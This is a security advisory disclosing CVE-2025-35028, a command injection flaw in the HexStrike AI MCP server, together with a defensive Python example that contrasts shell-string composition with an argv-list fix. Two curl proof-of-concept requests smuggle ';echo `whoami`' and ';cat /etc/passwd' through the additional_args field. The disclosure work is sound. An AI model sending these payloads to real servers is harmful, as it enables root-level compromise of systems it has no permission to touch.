CVE-2025-35028: HexStrike AI MCP Server Command Injection

AHA! has discovered an issue with HexStrike AI from 0x4m4, and is issuing this disclosure in accordance with AHA!’s standard disclosure policy on November 30, 2025. CVE-2025-35028 has been assigned to this issue. Any questions about this disclosure should be directed to [email protected].

The GCVE identifier for this issue is GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011

Executive Summary

HexStrike AI is a fairly popular model context protocol (MCP) server, having collected about five thousand stars on GitHub at the time of this disclosure, and has been forked over a thousand times. It is billed as an “AI-Powered MCP Cybersecurity Automation Platform,” and is likely shipping as part of other AI security products.

By supplying a command-line argument that starts with a semicolon (;) to an API endpoint created by the EnhancedCommandExecutor class of the HexStrike AI MCP server, an attacker causes the composed command string to be executed with the MCP server's normal privilege, which is typically root. The default configuration of this MCP server makes no attempt to sanitize these arguments.

This appears to be an instance of CWE-78, and has an estimated CVSSv3.1 score of 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). Note that this CVSS rating presumes the MCP server is run as-is in a default state, with no user authentication.

Technical Details

It is trivial for an attacker to inject additional commands via the EnhancedCommandExecutor object, near https://github.com/0x4m4/hexstrike-ai/blob/master/hexstrike_server.py#L6783.

Below is a straightforward example using a typical nmap command exposed by EnhancedCommandExecutor, tested against commit 33267047667b9accfbf0fdac1c1c7ff12f3a5512, the shipping version as of September 25, 2025 (this project does not appear to use version numbers or tagged releases).

Demo 1:

curl -X POST http://localhost:8888/api/tools/nmap \
  -H "Content-Type: application/json" \
  -d '{"target": "127.0.0.1", "scan_type": "-sV -Pn", "ports": "443,80,5000", "additional_args": ";echo `whoami`"}'|jq -r '.stdout'

Demo 2:

curl -X POST http://localhost:8888/api/tools/nmap \
  -H "Content-Type: application/json" \
  -d '{"target": "127.0.0.1", "scan_type": "-sV -Pn", "ports": "443,80,5000", "additional_args": ";cat /etc/passwd"}'|jq -r '.stdout'

Both demos return the output of the appended command to the caller in the stdout field of the JSON response.
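The root cause described above is the composition of request fields into a single command string that a shell then parses. The following added example, which is not code from the HexStrike AI project, contrasts that pattern with an argv-list form that never hands the request to a shell. The function names, the field-validation rules and the sample argument values are assumptions made for illustration and do not come from hexstrike_server.py.

```python
"""
Added example, not HexStrike AI's own code: a string-composed command
(the CWE-78 pattern) next to an argv-list builder that subprocess can run
without a shell. Names and validation rules are illustrative assumptions.
"""
import re
import shlex
import subprocess

# Constructed sample values: a benign extra flag set and the advisory's
# first demo payload, used here only to show that the builder rejects it.
BENIGN_ARGS = "--open -T4"
INJECTED_ARGS = ";echo `whoami`"

# Characters a POSIX shell uses to chain, substitute, group or redirect.
_SHELL_META = re.compile(r"[;&|`$<>(){}\n\r]")


def compose_shell_string(target, scan_type, ports, additional_args):
    """The vulnerable pattern: every field is pasted into one string that is
    later run through a shell. Anything after ';' becomes a second command.
    Shown for contrast only; this function never executes anything."""
    return f"nmap {scan_type} -p {ports} {additional_args} {target}"


def build_nmap_argv(target, scan_type, ports, additional_args=""):
    """Hardened form: reject shell metacharacters in every field, constrain
    the fields with a fixed syntax, then tokenize with shlex and return an
    argv list. The list form is the real fix; the metacharacter check is
    defense in depth so that bad input fails loudly instead of silently."""
    fields = (("target", target), ("scan_type", scan_type),
              ("ports", ports), ("additional_args", additional_args))
    for name, value in fields:
        if _SHELL_META.search(value):
            raise ValueError(f"shell metacharacter in {name!r}: {value!r}")
    if not re.fullmatch(r"[A-Za-z0-9.\-:/_]+", target):
        raise ValueError(f"invalid target: {target!r}")
    if not re.fullmatch(r"[0-9,\-]+", ports):
        raise ValueError(f"invalid ports: {ports!r}")
    argv = ["nmap", *shlex.split(scan_type), "-p", ports]
    if additional_args:
        argv.extend(shlex.split(additional_args))
    argv.append(target)
    return argv


def run_nmap(target, scan_type, ports, additional_args=""):
    """Execute with an argv list and no shell: a ';' that survives into an
    argument is just a token nmap itself will reject, not a command break."""
    argv = build_nmap_argv(target, scan_type, ports, additional_args)
    return subprocess.run(argv, capture_output=True, text=True, timeout=300)


if __name__ == "__main__":
    # The composed string shows where the second command would begin.
    print(compose_shell_string("127.0.0.1", "-sV -Pn", "443,80,5000", INJECTED_ARGS))
    # The argv builder accepts ordinary flags...
    print(build_nmap_argv("127.0.0.1", "-sV -Pn", "443,80,5000", BENIGN_ARGS))
    # ...and refuses the injected payload before anything is executed.
    try:
        build_nmap_argv("127.0.0.1", "-sV -Pn", "443,80,5000", INJECTED_ARGS)
    except ValueError as exc:
        print("rejected:", exc)
```

Passing a list to subprocess without shell=True is what removes the injection: the kernel receives the tokens as separate argv entries and no shell ever interprets them. The metacharacter and syntax checks are there so that a malformed or hostile request produces a logged ValueError rather than an nmap usage error, which is a more useful signal for the operator of the MCP server.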

Attacker Value#

If this MCP server is bound to a network interface reachable over ordinary TCP/IP, this issue can lead to total compromise of the MCP server's environment. That is the normal configuration and usage of the hexstrike-ai MCP project, which, as mentioned, is a fairly popular API harness for exposing cybersecurity tooling for evaluation and penetration testing.

Credit#

This issue was discovered and disclosed by jippen of AHA!.

Timeline#

  • 2025-09-25 (Thu): Presented at regularly scheduled AHA! meeting
  • 2025-10-01 (Wed): Disclosed to the vendor at [email protected]
  • 2025-11-20 (Thu): Reminder to the vendor of the upcoming disclosure
  • 2025-11-30 (Sun): Public disclosure of CVE-2025-35028